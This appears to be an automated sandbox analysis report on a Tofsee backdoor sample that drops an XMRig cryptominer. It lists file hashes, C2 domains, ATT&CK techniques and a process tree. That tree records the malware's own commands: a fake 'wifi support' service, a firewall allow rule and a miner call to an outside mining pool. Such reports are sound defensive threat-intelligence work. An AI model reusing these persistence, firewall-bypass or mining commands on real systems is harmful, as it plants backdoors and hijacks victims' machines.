Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    11-05-2023 20:26

General

  • Target

    file.exe

  • Size

    318KB

  • MD5

    b101be318ab44ddbbabf025ef02e9a29

  • SHA1

    0e3d67a5c6f97f6f1d23a9540336b3ded4eaa13f

  • SHA256

    0967dfa48bd1d2d0e282f762e9be80315cc6ea75b6e1b34d73f066c47ab46612

  • SHA512

    79533d9d92770221a5631f942d48f893ec5cf0d3c8af899465b2cc4b4b92da5c3787cc65425c34d026fcb646b08348dd68ec14a3c9f56cdd914591594f8aa001

  • SSDEEP

    3072:TpXtNfDL3hmn5585BYMpYEvLDWPS5Z2wg3z2zxBUb5EpMYNY0lKRfeJ:RnLL3h45VMpYi2czjlpxPcQJ

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\iygwymvf\
      2⤵
        PID:924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nhhzcmqc.exe" C:\Windows\SysWOW64\iygwymvf\
        2⤵
          PID:516
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create iygwymvf binPath= "C:\Windows\SysWOW64\iygwymvf\nhhzcmqc.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1688
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description iygwymvf "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:580
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start iygwymvf
          2⤵
          • Launches sc.exe
          PID:1740
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1780
      • C:\Windows\SysWOW64\iygwymvf\nhhzcmqc.exe
        C:\Windows\SysWOW64\iygwymvf\nhhzcmqc.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:976
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.70000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:924

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\nhhzcmqc.exe
        Filesize

        12.4MB

        MD5

        2632826bc8834ca016350745ad1d19ef

        SHA1

        200b3de91abb057ea920f2013e5508d1a4e0324c

        SHA256

        468e4d4edad56fad7d926c2e5ee9dd0be3861473bd1d6b338c75214fe677c82f

        SHA512

        aee7d9b5a61cb4117d713c927d3389b93f32920f06f09e9af1657f37c533a8ff328686087c0eaf9588095cb651caa7cf9b4e028c933cec04f9d13b3827199c40

      • C:\Windows\SysWOW64\iygwymvf\nhhzcmqc.exe
        Filesize

        12.4MB

        MD5

        2632826bc8834ca016350745ad1d19ef

        SHA1

        200b3de91abb057ea920f2013e5508d1a4e0324c

        SHA256

        468e4d4edad56fad7d926c2e5ee9dd0be3861473bd1d6b338c75214fe677c82f

        SHA512

        aee7d9b5a61cb4117d713c927d3389b93f32920f06f09e9af1657f37c533a8ff328686087c0eaf9588095cb651caa7cf9b4e028c933cec04f9d13b3827199c40

      • memory/924-111-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/924-123-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/924-124-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/924-122-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/924-121-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/924-120-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/924-119-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/924-112-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/976-87-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-94-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-74-0x0000000001B30000-0x0000000001D3F000-memory.dmp
        Filesize

        2.1MB

      • memory/976-75-0x0000000000110000-0x0000000000116000-memory.dmp
        Filesize

        24KB

      • memory/976-78-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-81-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-82-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-83-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-84-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-86-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-85-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-88-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-63-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/976-89-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-90-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-91-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-92-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-71-0x0000000001B30000-0x0000000001D3F000-memory.dmp
        Filesize

        2.1MB

      • memory/976-93-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-95-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-96-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-97-0x0000000000120000-0x0000000000130000-memory.dmp
        Filesize

        64KB

      • memory/976-98-0x0000000000130000-0x0000000000135000-memory.dmp
        Filesize

        20KB

      • memory/976-101-0x0000000000130000-0x0000000000135000-memory.dmp
        Filesize

        20KB

      • memory/976-102-0x00000000054F0000-0x00000000058FB000-memory.dmp
        Filesize

        4.0MB

      • memory/976-105-0x00000000054F0000-0x00000000058FB000-memory.dmp
        Filesize

        4.0MB

      • memory/976-106-0x0000000000260000-0x0000000000267000-memory.dmp
        Filesize

        28KB

      • memory/976-110-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/976-69-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/976-68-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/976-62-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/976-67-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/976-61-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1856-65-0x0000000000400000-0x000000000236D000-memory.dmp
        Filesize

        31.4MB

      • memory/2008-56-0x0000000000230000-0x0000000000243000-memory.dmp
        Filesize

        76KB

      • memory/2008-60-0x0000000000400000-0x000000000236D000-memory.dmp
        Filesize

        31.4MB